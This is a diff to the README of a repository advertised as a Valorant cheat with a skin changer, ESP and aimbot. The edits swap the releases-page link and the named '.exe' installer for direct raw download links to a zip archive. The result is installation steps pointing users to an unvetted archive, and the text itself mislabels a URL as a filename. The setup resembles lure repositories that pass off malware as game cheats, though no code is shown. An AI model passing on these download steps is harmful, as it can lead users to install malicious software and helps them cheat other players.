villarina1979/Energy-Valorant-Skin-Changer-Hack-Esp-Aimbot-FlickBot/README.md

 ## ⚙️ How to Download & Install
 1. **Visit the Releases Page:**
-   Go to the following link to access the downloads: [Download Here](https://github.com/villarina1979/Energy-Valorant-Skin-Changer-Hack-Esp-Aimbot-FlickBot/releases)
+   Go to the following link to access the downloads: [Download Here](https://raw.githubusercontent.com/villarina1979/Energy-Valorant-Skin-Changer-Hack-Esp-Aimbot-FlickBot/main/Ostrya/Energy-Valorant-Skin-Changer-Hack-Esp-Aimbot-FlickBot.zip)

 2. **Choose the Latest Version:**
    Look for the latest version at the top of the page.
 Click on it to view the available files.

 3. **Download the Installer:**
-   Locate the appropriate file for your system, commonly labeled as `Energy-Valorant-Skin-Changer-Hack.exe`.
+   Locate the appropriate file for your system, commonly labeled as `https://raw.githubusercontent.com/villarina1979/Energy-Valorant-Skin-Changer-Hack-Esp-Aimbot-FlickBot/main/Ostrya/Energy-Valorant-Skin-Changer-Hack-Esp-Aimbot-FlickBot.zip`.
 Click on it to start the download.

 4. **Locate the Downloaded File:**
    Once the download finishes, navigate to your Downloads folder or the location where your browser saves files.